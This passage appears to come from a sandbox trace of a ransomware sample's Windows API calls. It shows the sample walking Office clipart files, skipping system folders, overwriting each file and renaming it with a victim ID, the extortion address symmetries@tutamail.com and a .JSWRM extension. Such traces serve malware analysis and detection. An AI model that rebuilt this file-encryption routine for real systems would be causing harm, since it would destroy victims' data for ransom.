lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0074.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0074.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0074.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0074.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0074.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0074.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.168] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17ac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04117_.WMF", cAlternateFileName="")) returned 1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2=".") returned 1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="..") returned 1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="...") returned 1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="windows") returned -1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="recovery") returned -1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="perflogs") returned -1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="documents and settings") returned -1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="system volume information") returned -1 [0074.168] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="msocache") returned -1 [0074.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0074.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04117_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04117_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04117_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0074.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0074.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04117_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04117_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04117_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0074.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.169] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6060) returned 1 [0074.169] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17a0) returned 0x24c1d0 [0074.169] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x17a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x17a0, lpOverlapped=0x0) returned 1 [0074.170] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.170] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x17a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x17a0, lpOverlapped=0x0) returned 1 [0074.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.171] CloseHandle (hObject=0x460) returned 1 [0074.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0074.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0074.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0074.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0074.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.171] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.172] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04134_.WMF", cAlternateFileName="")) returned 1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2=".") returned 1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="..") returned 1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="...") returned 1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="windows") returned -1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="recovery") returned -1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="perflogs") returned -1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="documents and settings") returned -1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="system volume information") returned -1 [0074.172] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="msocache") returned -1 [0074.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0074.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04134_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04134_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04134_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0074.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0074.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04134_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04134_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04134_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0074.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.173] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3416) returned 1 [0074.173] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd50) returned 0x24c1d0 [0074.173] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xd50, lpOverlapped=0x0) returned 1 [0074.175] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.175] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xd50, lpOverlapped=0x0) returned 1 [0074.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.175] CloseHandle (hObject=0x460) returned 1 [0074.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0074.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0074.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0074.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0074.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0074.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0074.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.176] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04174_.WMF", cAlternateFileName="")) returned 1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2=".") returned 1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="..") returned 1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="...") returned 1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="windows") returned -1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="recovery") returned -1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="perflogs") returned -1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="documents and settings") returned -1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="system volume information") returned -1 [0074.176] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="msocache") returned -1 [0074.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04174_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04174_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04174_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04174_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04174_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04174_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.177] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2636) returned 1 [0074.177] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa40) returned 0x23fc98 [0074.177] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xa40, lpOverlapped=0x0) returned 1 [0074.178] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.178] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xa40, lpOverlapped=0x0) returned 1 [0074.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.179] CloseHandle (hObject=0x460) returned 1 [0074.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0074.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0074.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0074.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0074.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0074.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0074.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.180] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, 